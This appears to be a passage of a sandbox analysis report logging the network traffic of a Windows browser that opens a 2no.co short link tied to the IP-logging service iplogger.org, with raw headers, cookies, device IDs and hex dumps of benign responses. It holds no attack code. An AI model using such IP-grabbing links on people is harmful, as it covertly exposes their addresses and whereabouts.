                                                                                                                Date: Mon, 29 Jul 2024 22:49:17 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 32
                                                                                                                Connection: close
                                                                                                                Location: https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069
                                                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                                                Pragma: no-cache
                                                                                                                Cache-control: no-cache
                                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                                Set-Cookie: FTID=1cg1nj32dger1cg1nj00367b; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                                Strict-Transport-Security: max-age=86400
                                                                                                                2024-07-29 22:49:17 UTC32INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 4d 6f 76 65 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                Data Ascii: <html><body>Moved</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.94973335.190.80.14435364C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:17 UTC543OUTOPTIONS /report/v4?s=%2BJTmNHgwHioPN1VPmZTocnt4x9yCwTmjK4IGhHrpCVWNf%2BX0QfcS27EEgMEfDt3n5oBkVrfy2gmymxlRNncb3eE%2BNabns2V2oWdUqt%2B6pchIIk0y0eYxI%2Bvmxvy3PDh%2B%2FlTe HTTP/1.1
                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                Connection: keep-alive
                                                                                                                Origin: https://cdn.iplogger.org
                                                                                                                Access-Control-Request-Method: POST
                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-07-29 22:49:17 UTC336INHTTP/1.1 200 OK
                                                                                                                Content-Length: 0
                                                                                                                access-control-max-age: 86400
                                                                                                                access-control-allow-methods: POST, OPTIONS
                                                                                                                access-control-allow-origin: *
                                                                                                                access-control-allow-headers: content-length, content-type
                                                                                                                date: Mon, 29 Jul 2024 22:49:17 GMT
                                                                                                                Via: 1.1 google
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.94973220.114.59.183443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:18 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vWUpoG9ux8uKoBS&MD=+k9WfbGS HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                2024-07-29 22:49:18 UTC560INHTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Expires: -1
                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                MS-CorrelationId: 43915090-0741-4853-8b92-023f0f7b4ba3
                                                                                                                MS-RequestId: 16bd080c-ef16-4974-aeab-7ac6c78d49a2
                                                                                                                MS-CV: wpDfPoWlBE6D/CA7.0
                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Mon, 29 Jul 2024 22:49:17 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 24490
                                                                                                                2024-07-29 22:49:18 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                2024-07-29 22:49:18 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.94973688.212.202.524435364C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:18 UTC706OUTGET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 HTTP/1.1
                                                                                                                Host: counter.yadro.ru
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://2no.co/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                Cookie: FTID=1cg1nj32dger1cg1nj00367b
                                                                                                                2024-07-29 22:49:18 UTC481INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.17.9
                                                                                                                Date: Mon, 29 Jul 2024 22:49:18 GMT
                                                                                                                Content-Type: image/gif
                                                                                                                Content-Length: 445
                                                                                                                Connection: close
                                                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                                                Pragma: no-cache
                                                                                                                Cache-control: no-cache
                                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                                Set-Cookie: VID=2DNPIG0nbdur1cg1nk003HAo; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Strict-Transport-Security: max-age=86400
                                                                                                                2024-07-29 22:49:18 UTC445INData Raw: 47 49 46 38 37 61 1f 00 1f 00 d5 00 00 02 02 02 82 56 06 da be 86 42 2e 0a c2 82 02 22 1a 06 a2 6a 06 32 26 08 62 42 06 de ae 42 fa de a1 b2 76 02 5a 4e 3e ea a2 16 2a 26 1a ee d6 aa 52 36 06 2a 22 0a da a2 2a 3a 26 08 94 62 06 da 92 02 a6 72 12 26 22 0b ac 72 02 4a 2e 0a ca 86 02 72 4a 06 fe de 9e ba 7a 02 f2 de ae 24 1e 0e 36 26 08 fe de 9a fe ba 32 fe c6 52 fe aa 02 5e 3e 08 8e 5e 06 9e 6a 06 7e 52 06 f2 da b2 4e 36 0a 6a 46 06 f7 de a6 26 1e 0a a5 6e 02 f2 da ae 56 3a 0a 3e 2a 08 de 96 06 4e 32 06 86 5a 06 46 2e 06 c6 86 02 b6 7a 02 2e 22 08 96 66 06 ae 76 02 ce 8a 02 76 4e 06 bc 7e 02 f6 de aa c6 82 02 2c 00 00 00 00 1f 00 1f 00 00 06 e2 c0 10 67 a8 28 16 59 48 96 6f e9 f3 bc 9e d0 94 54 fa 48 84 46 a4 ac 76 cb ed 76 1b 94 ab 77 4c d6 6a c2 d8 b2 9a
                                                                                                                Data Ascii: GIF87aVB."j2&bBBvZN>*&R6*"*:&br&"rJ.rJz$6&2R^>^j~RN6jF&nV:>*N2ZF.z."fvvN~,g(YHoTHFvvwLj


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.94974035.190.80.14435364C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:18 UTC484OUTPOST /report/v4?s=%2BJTmNHgwHioPN1VPmZTocnt4x9yCwTmjK4IGhHrpCVWNf%2BX0QfcS27EEgMEfDt3n5oBkVrfy2gmymxlRNncb3eE%2BNabns2V2oWdUqt%2B6pchIIk0y0eYxI%2Bvmxvy3PDh%2B%2FlTe HTTP/1.1
                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                Connection: keep-alive
                                                                                                                Content-Length: 423
                                                                                                                Content-Type: application/reports+json
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-07-29 22:49:18 UTC423OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 30 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 32 6e 6f 2e 63 6f 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 34 2e 32 30 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63
                                                                                                                Data Ascii: [{"age":1,"body":{"elapsed_time":1106,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://2no.co/","sampling_fraction":1.0,"server_ip":"104.21.4.208","status_code":403,"type":"http.error"},"type":"network-error","url":"https://c
                                                                                                                2024-07-29 22:49:18 UTC168INHTTP/1.1 200 OK
                                                                                                                Content-Length: 0
                                                                                                                date: Mon, 29 Jul 2024 22:49:18 GMT
                                                                                                                Via: 1.1 google
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                7192.168.2.94974123.206.229.209443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:18 UTC2223OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                Origin: https://www.bing.com
                                                                                                                Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-CH
                                                                                                                Content-type: text/xml
                                                                                                                X-Agent-DeviceId: 01000A4109008071
                                                                                                                X-BM-CBT: 1696497265
                                                                                                                X-BM-DateFormat: dd/MM/yyyy
                                                                                                                X-BM-DeviceDimensions: 784x984
                                                                                                                X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                X-BM-DeviceScale: 100
                                                                                                                X-BM-DTZ: 60
                                                                                                                X-BM-Market: CH
                                                                                                                X-BM-Theme: 000000;0078d7
                                                                                                                X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                X-Device-ClientSession: 3967AB70E8E74431908B580AED7E67B3
                                                                                                                X-Device-isOptin: false
                                                                                                                X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                X-Device-OSSKU: 48
                                                                                                                X-Device-Touch: false
                                                                                                                X-DeviceID: 01000A4109008071
                                                                                                                X-MSEdge-ExternalExp: bfbwsbghf928t,bfbwsbrs0830tf,d-thshldspcl40,fliptrac6,optfsc,spofglclickserpf2,wsbqfasmsall_t,wsbqfminiserp600,wsbref-c
                                                                                                                X-MSEdge-ExternalExpType: JointCoord
                                                                                                                X-PositionerType: Desktop
                                                                                                                X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                X-Search-CortanaAvailableCapabilities: None
                                                                                                                X-Search-SafeSearch: Moderate
                                                                                                                X-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard Time
                                                                                                                X-UserAgeClass: Unknown
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                Host: www.bing.com
                                                                                                                Content-Length: 516
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: SRCHUID=V=2&GUID=507B984BF29F418EA13B8912FCE289B0&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&LUT=1696497029183&IPMH=5c67ba25&IPMID=1696497265539&HV=1696497179; CortanaAppUID=D36DDDF07E1B512856780840298B626F; MUID=531305E83CE64DE088676FE94B9682C4; _SS=SID=3314E043C3866D730FEDF3E2C2436C30&CPID=1696497266478&AC=1&CPH=c11e7441; _EDGE_S=SID=3314E043C3866D730FEDF3E2C2436C30; MUIDB=531305E83CE64DE088676FE94B9682C4
                                                                                                                2024-07-29 22:49:18 UTC1OUTData Raw: 3c
                                                                                                                Data Ascii: <
                                                                                                                2024-07-29 22:49:18 UTC515OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 35 33 31 33 30 35 45 38 33 43 45 36 34 44 45 30 38 38 36 37 36 46 45 39 34 42 39 36 38 32 43 34 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 38 32 39 46 43 45 45 38 38 41 35 32 34 46 34 31 39 34 33 46 33 33 35 42 38 33 32 44 31 41 34 37 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                                                                                Data Ascii: ClientInstRequest><CID>531305E83CE64DE088676FE94B9682C4</CID><Events><E><T>Event.ClientInst</T><IG>829FCEE88A524F41943F335B832D1A47</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                                                                2024-07-29 22:49:19 UTC480INHTTP/1.1 204 No Content
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                X-MSEdge-Ref: Ref A: 669DE395C7C64F93AB3AD1AB07540089 Ref B: LAX311000110035 Ref C: 2024-07-29T22:49:19Z
                                                                                                                Date: Mon, 29 Jul 2024 22:49:19 GMT
                                                                                                                Connection: close
                                                                                                                Alt-Svc: h3=":443"; ma=93600
                                                                                                                X-CDN-TraceID: 0.d1d7ce17.1722293359.2bc2cea0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.949742104.21.4.2084435364C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:19 UTC577OUTGET /favicon.ico HTTP/1.1
                                                                                                                Host: cdn.iplogger.org
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://2no.co/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-07-29 22:49:19 UTC755INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 29 Jul 2024 22:49:19 GMT
                                                                                                                Content-Type: image/x-icon
                                                                                                                Content-Length: 2833
                                                                                                                Connection: close
                                                                                                                last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                                etag: "629f3a26-b11"
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                Cache-Control: max-age=14400
                                                                                                                CF-Cache-Status: HIT
                                                                                                                Age: 6037
                                                                                                                Accept-Ranges: bytes
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JoMXqJ2mbYFuFHwjCLyoKmOrb5Kd%2F762H3tpxfcpijtSRgLCe9U4%2B%2FVs06gulAgnd1OvtWwLXovhIeqqUJ3NHbHRv6seHbczlwLA7jG2KP9sWDH5qMge0JM3xaGal12KsQTN"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ab0a9591a848c65-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                2024-07-29 22:49:19 UTC614INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                                                                Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                                                                2024-07-29 22:49:19 UTC1369INData Raw: 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a 7e 3d 62 9a eb b9 c5 93 c0 da 54 48 ed 99 f9 c7 87 18 e0 4d e7 bb 11 f7 f6 18 d7 4b ae e0 61 e0 da 52 34 38 0e e0 8f c4 57 02 5b 81 af 36 98 a0 83 3f 00 e7 16 33 89 29 ad f5 72 e0 57 48 64 38 13 07 81 6f 28 a5 5e 02 88 e5 f4 8d c0 5d 0d c6 7e 15 38 65 66 34 39 8d 01 46 eb ff 0c b8 c4 c5 64 ab 51 46 16 7a 67 29 1a 2c fb 23 f1 45 c0 2d 88 05
                                                                                                                Data Ascii: L!8aV#|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3~=bTHMKaR48W[6?3)rWHd8o(^]~8ef49FdQFzg),#E-
                                                                                                                2024-07-29 22:49:19 UTC850INData Raw: 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 df f3 70 e8 e3 8b 41 3a 36 6e 40 52 da bb b2 e1 4e a7 41 22 80 14 25 23 88 e5 58 86 ec 96 a7 6a 9c 29 c4 b1 1a 44 76 78 67 95 99 23 59 d0 01 20 4b 73 3d 8a 83 c0 19 fd 81 0f b7 c9 d4 ca 06 6d 47 ec 6a a3 2a ef 76 e0 e1 52 34 08 03 a3 5f 40 76 6c 11 92 d4 dc d1 3b 30 ba 0d d8 9b 0d 77 16 10 65 f9 a8 3f 12 f7 21 a7 61 99 b9 3a 2d 32 87 80 23
                                                                                                                Data Ascii: x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]opA:6n@RNA"%#Xj)Dvxg#Y Ks=mGj*vR4_@vl;0we?!a:-2#


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.94974388.212.201.2044435364C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:20 UTC510OUTGET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 HTTP/1.1
                                                                                                                Host: counter.yadro.ru
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                Cookie: FTID=1cg1nj32dger1cg1nj00367b; VID=2DNPIG0nbdur1cg1nk003HAo
                                                                                                                2024-07-29 22:49:20 UTC459INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.17.9
                                                                                                                Date: Mon, 29 Jul 2024 22:49:20 GMT
                                                                                                                Content-Type: image/gif
                                                                                                                Content-Length: 445
                                                                                                                Connection: close
                                                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                                                Pragma: no-cache
                                                                                                                Cache-control: no-cache
                                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                                Set-Cookie: FTID=0; path=/; expires=Sat, 01 Jan 2000 00:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Strict-Transport-Security: max-age=86400
                                                                                                                2024-07-29 22:49:20 UTC445INData Raw: 47 49 46 38 37 61 1f 00 1f 00 d5 00 00 02 02 02 82 56 06 da be 86 42 2e 0a c2 82 02 22 1a 06 a2 6a 06 32 26 08 62 42 06 de ae 42 fa de a1 b2 76 02 5a 4e 3e ea a2 16 2a 26 1a ee d6 aa 52 36 06 2a 22 0a da a2 2a 3a 26 08 94 62 06 da 92 02 a6 72 12 26 22 0b ac 72 02 4a 2e 0a ca 86 02 72 4a 06 fe de 9e ba 7a 02 f2 de ae 24 1e 0e 36 26 08 fe de 9a fe ba 32 fe c6 52 fe aa 02 5e 3e 08 8e 5e 06 9e 6a 06 7e 52 06 f2 da b2 4e 36 0a 6a 46 06 f7 de a6 26 1e 0a a5 6e 02 f2 da ae 56 3a 0a 3e 2a 08 de 96 06 4e 32 06 86 5a 06 46 2e 06 c6 86 02 b6 7a 02 2e 22 08 96 66 06 ae 76 02 ce 8a 02 76 4e 06 bc 7e 02 f6 de aa c6 82 02 2c 00 00 00 00 1f 00 1f 00 00 06 e2 c0 10 67 a8 28 16 59 48 96 6f e9 f3 bc 9e d0 94 54 fa 48 84 46 a4 ac 76 cb ed 76 1b 94 ab 77 4c d6 6a c2 d8 b2 9a
                                                                                                                Data Ascii: GIF87aVB."j2&bBBvZN>*&R6*"*:&br&"rJ.rJz$6&2R^>^j~RN6jF&nV:>*N2ZF.z."fvvN~,g(YHoTHFvvwLj


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.949746104.21.4.2084435364C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
